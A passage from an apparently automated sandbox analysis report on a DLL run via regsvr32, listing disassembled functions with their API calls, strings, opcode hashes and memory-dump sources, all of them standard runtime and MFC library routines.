                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: __doserrno_errno
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 921712934-0
                                                                                                                                                                                    • Opcode ID: 573213ff306147f9f3e7e2e12180e771baebcbf52806ff7d2705c40bc8994e8b
                                                                                                                                                                                    • Instruction ID: d22bd5b64ca0b5cdf4bb450e75ffe74a40766e49a6e009e0d129e5f12afecdcb
                                                                                                                                                                                    • Opcode Fuzzy Hash: 573213ff306147f9f3e7e2e12180e771baebcbf52806ff7d2705c40bc8994e8b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4F310F326113584AE793AF65A8417DD7751ABC9BE4FA6C610BA250BBD3CF38C60A8700
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 000000018002DC10 Relevance: 12.1, APIs: 8, Instructions: 79COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: __doserrno_errno
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 921712934-0
                                                                                                                                                                                    • Opcode ID: 7f9bfa7f6b3b9fdd36b8e81f9ee80aab1db3c1f38b0960ba002171062fd1780c
                                                                                                                                                                                    • Instruction ID: f0232f039d8bce094d8b32849d96be76d1f87cc1526168bd6dc77fb22e7aae15
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7f9bfa7f6b3b9fdd36b8e81f9ee80aab1db3c1f38b0960ba002171062fd1780c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7F31BF3260075C4AE3939F65A8817ED7751A7C97E0F65C616BA2507BC3CFB8CA09C714
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0000000180024D98 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 199COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetStartupInfoA.KERNEL32 ref: 0000000180024DBD
                                                                                                                                                                                      • Part of subcall function 0000000180024C8C: Sleep.KERNEL32(?,?,?,00000001800233AB,?,?,00000018,0000000180020621,?,?,?,?,00000001800202E6,?,?,00000018), ref: 0000000180024CD1
                                                                                                                                                                                    • GetFileType.KERNEL32 ref: 0000000180024F3A
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileInfoSleepStartupType
                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                    • API String ID: 1527402494-2766056989
                                                                                                                                                                                    • Opcode ID: 4115f97c95f48f42d5fb0d7c09de9e27c90b4dcbb02c20c61c57aa5a611d3b54
                                                                                                                                                                                    • Instruction ID: 787ffa1011b319094256726134ae780eee21af125c7e7e84dcace78b9ee0a316
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4115f97c95f48f42d5fb0d7c09de9e27c90b4dcbb02c20c61c57aa5a611d3b54
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8B91D232200A8885E7938B24D8887D83799F3497F4F66C725E6794B3D0DF38CA4AC351
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 000000018001D314 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 157stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharGlobalLockMultiWidelstrlen
                                                                                                                                                                                    • String ID: $System
                                                                                                                                                                                    • API String ID: 1529587224-3632600494
                                                                                                                                                                                    • Opcode ID: d2703cc869ed1a886df224d2db9d943919ea9925d38045901a0c3b8a65b2d957
                                                                                                                                                                                    • Instruction ID: 2ec2ac6396577c323e07ed7633a118e9507b8bfdffa3f7a026bb8033331b454e
                                                                                                                                                                                    • Opcode Fuzzy Hash: d2703cc869ed1a886df224d2db9d943919ea9925d38045901a0c3b8a65b2d957
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8251E435200A4C47FBAADB65A4853EA3360F74C7D4F14C622FA6A836D5DF38D65C8701
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0000000180017FE0 Relevance: 10.6, APIs: 7, Instructions: 93COMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: free$AtomDeleteGlobal
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 622211665-0
                                                                                                                                                                                    • Opcode ID: 21cadab93b084a3aca9f40b95dda2b5d4659b4390553c7fa0275e1dcf1520850
                                                                                                                                                                                    • Instruction ID: 256857c22df60e5953c5d778c392966909792f1112518ace18b13e53ff84b243
                                                                                                                                                                                    • Opcode Fuzzy Hash: 21cadab93b084a3aca9f40b95dda2b5d4659b4390553c7fa0275e1dcf1520850
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4B41ED32205E8881EB92DB61D5903ED7365FB8CFC4F558221EA5E477A6CF75CA89C310
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 000000018002D820 Relevance: 10.6, APIs: 7, Instructions: 79COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _errno
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2918714741-0
                                                                                                                                                                                    • Opcode ID: 1812c0f08b3c91dba4667278a0a23935b929cddd7c86df6e234f18bbf35c51e8
                                                                                                                                                                                    • Instruction ID: b8cb160ec996a59629ed9919aa9213f644f9b8d2e066b9a818b4595355941c27
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1812c0f08b3c91dba4667278a0a23935b929cddd7c86df6e234f18bbf35c51e8
                                                                                                                                                                                    • Instruction Fuzzy Hash: B4310631A1064C4AF7D36F7494453EE6711A78D7E0F55C229FA25076D3CFBC8A498714
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 000000018002F779 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 72COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _cwprintf_s_l
                                                                                                                                                                                    • String ID: %s (%s:%d)$%s (%s:%d)%s$Exception thrown in destructor$f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appcore.cpp
                                                                                                                                                                                    • API String ID: 2941638530-1547102704
                                                                                                                                                                                    • Opcode ID: a1729cb3b559574853afee8893454c7f5dd18c679475ff671ed86927da65b811
                                                                                                                                                                                    • Instruction ID: 069268042e3cb74b8a3afc57b8637407fc1a9215e2d175f679b7f0bd571a46fb
                                                                                                                                                                                    • Opcode Fuzzy Hash: a1729cb3b559574853afee8893454c7f5dd18c679475ff671ed86927da65b811
                                                                                                                                                                                    • Instruction Fuzzy Hash: DC216B36200A48D6EB96DF25E8807ED6361F788BC8F958412FA0E43765DF38CA8DC340
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 00000001800213F8 Relevance: 10.6, APIs: 7, Instructions: 70memoryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Heap_errno$AllocDecodeErrorInformationLastPointerQuerySize
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3929725371-0
                                                                                                                                                                                    • Opcode ID: 12c4976b141d612dcd5d330fd3ec714f76899af343f045324a6be9cfcfc1dd57
                                                                                                                                                                                    • Instruction ID: 062cf6bf7f7628caa203472146d01a39a91c2f33369974265bdc5446454d3509
                                                                                                                                                                                    • Opcode Fuzzy Hash: 12c4976b141d612dcd5d330fd3ec714f76899af343f045324a6be9cfcfc1dd57
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1C218231600B4C8AFBA3AB61B4043DA63A1B79DBD5F54C625BE5D47BD5DF38C6488700
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 000000018002F2B9 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 69COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _cwprintf_s_l
                                                                                                                                                                                    • String ID: %s (%s:%d)$%s (%s:%d)%s$Exception thrown in destructor$f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
                                                                                                                                                                                    • API String ID: 2941638530-49975270
                                                                                                                                                                                    • Opcode ID: c724c86bb45442d739b1fba9f3ec93512766b425ee96f71a149b15e3be575dfd
                                                                                                                                                                                    • Instruction ID: 4f32fa752ccb912587874914e0efdef237d754c3ea33ebf9ac449787003c76f0
                                                                                                                                                                                    • Opcode Fuzzy Hash: c724c86bb45442d739b1fba9f3ec93512766b425ee96f71a149b15e3be575dfd
                                                                                                                                                                                    • Instruction Fuzzy Hash: 20214A76201E49D6EB96DF65E8907E92360F789BD8F848026BA0E47765DF38C68DC340
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 000000018002F4D2 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 69COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _cwprintf_s_l
                                                                                                                                                                                    • String ID: %s (%s:%d)$%s (%s:%d)%s$Exception thrown in destructor$f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl2.cpp
                                                                                                                                                                                    • API String ID: 2941638530-3838821042
                                                                                                                                                                                    • Opcode ID: 0a135b7371076fea88fa5a50cbab8ea7c558774cfa4fc1f5e82a052c743733c8
                                                                                                                                                                                    • Instruction ID: 2fa1177910dd0dcacec49574704993d9df7ec86c5064cafcb5f9df024e6f0ea7
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0a135b7371076fea88fa5a50cbab8ea7c558774cfa4fc1f5e82a052c743733c8
                                                                                                                                                                                    • Instruction Fuzzy Hash: 04218C72200E49DAEB96DF24D8407E92361F788BD8F858122FA0E47765DF38C68CC300
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0000000180023BBA Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _getptd$ExceptionRaise
                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                    • API String ID: 2255768072-1018135373
                                                                                                                                                                                    • Opcode ID: ea574b5edaaeab3ca260add0885928c84f8804db7bdd6b1f2d047af1ca93cd8b
                                                                                                                                                                                    • Instruction ID: b9e2784e194229325601cefd8c9894d73a91a3f0af42d97bb3ad41b1dd7c7a26
                                                                                                                                                                                    • Opcode Fuzzy Hash: ea574b5edaaeab3ca260add0885928c84f8804db7bdd6b1f2d047af1ca93cd8b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 89314D3620068886D6A3DF11E04DBAE7764F39CBE1F528126EE5917791CF35D689CB00
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 000000018001CFA4 Relevance: 10.6, APIs: 7, Instructions: 62windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$Parent$ActiveCaptureFocusLastLongPopupWindow
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3194460488-0
                                                                                                                                                                                    • Opcode ID: cc96ef4c442f95d66963967e32dfbcd3254cab8da31def956c74eb2c6720cbc7
                                                                                                                                                                                    • Instruction ID: 07c438c58fd00e46daf1bbc851bc390cf407a58e354d1e5a6537ddeb8b99ea43
                                                                                                                                                                                    • Opcode Fuzzy Hash: cc96ef4c442f95d66963967e32dfbcd3254cab8da31def956c74eb2c6720cbc7
                                                                                                                                                                                    • Instruction Fuzzy Hash: 01215730315E4D42FFE75B51A555FEA17A0AB8CBC5F18E435BD0A0BB91EE39C64A4700
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0000000180026E94 Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • _FF_MSGBANNER.LIBCMT ref: 0000000180026EBB
                                                                                                                                                                                      • Part of subcall function 0000000180025A20: GetModuleFileNameA.KERNEL32(?,?,?,?,?,0000000180025C7C,?,?,?,?,0000000180026EC0,?,?,00000000,0000000180026F9F), ref: 0000000180025AE3
                                                                                                                                                                                      • Part of subcall function 0000000180020F28: ExitProcess.KERNEL32 ref: 0000000180020F37
                                                                                                                                                                                      • Part of subcall function 0000000180024C20: malloc.LIBCMT ref: 0000000180024C3F
                                                                                                                                                                                      • Part of subcall function 0000000180024C20: Sleep.KERNEL32(?,?,00000000,0000000180026EF5,?,?,00000000,0000000180026F9F,?,?,?,?,?,?,00000000,00000001800233D0), ref: 0000000180024C56
                                                                                                                                                                                    • _errno.LIBCMT ref: 0000000180026EFD
                                                                                                                                                                                    • _lock.LIBCMT ref: 0000000180026F11
                                                                                                                                                                                    • free.LIBCMT ref: 0000000180026F33
                                                                                                                                                                                    • _errno.LIBCMT ref: 0000000180026F38
                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,00000000,0000000180026F9F,?,?,?,?,?,?,00000000,00000001800233D0,?,?,00000018,0000000180020621), ref: 0000000180026F5E
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _errno$CriticalExitFileLeaveModuleNameProcessSectionSleep_lockfreemalloc
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1024173049-0
                                                                                                                                                                                    • Opcode ID: d1c18c0459d98f96b4427944a3fbbb8438d4153634f096a9af820caac949fb41
                                                                                                                                                                                    • Instruction ID: eb38f224bc67bb9a445eac6bcc21c339ea187fc349147bf310b7517d9eab2bff
                                                                                                                                                                                    • Opcode Fuzzy Hash: d1c18c0459d98f96b4427944a3fbbb8438d4153634f096a9af820caac949fb41
                                                                                                                                                                                    • Instruction Fuzzy Hash: AD21AC31A1174C86FAE3AB10F6453EA6394E78C7C5F54C434BA4A87AE6CF38CA488340
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 00000001800175C0 Relevance: 10.6, APIs: 7, Instructions: 56memorystringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreePrinter.Unlocklstrcmp
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 992435789-0
                                                                                                                                                                                    • Opcode ID: e404d6227590b9a59288eec4fe9c0a3830750e9ec27887a395cfdb28078c9a7f
                                                                                                                                                                                    • Instruction ID: 52eb7aaa83a20578586af01048df22031be017a7ba6e2f9e2f91c51488b2ccc7
                                                                                                                                                                                    • Opcode Fuzzy Hash: e404d6227590b9a59288eec4fe9c0a3830750e9ec27887a395cfdb28078c9a7f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8721A171200E8846EB96DB65E5153EE6360FB8CBC9F04C525FF4E4B69ACF6CC6488700
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 000000018001CD6C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54registryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
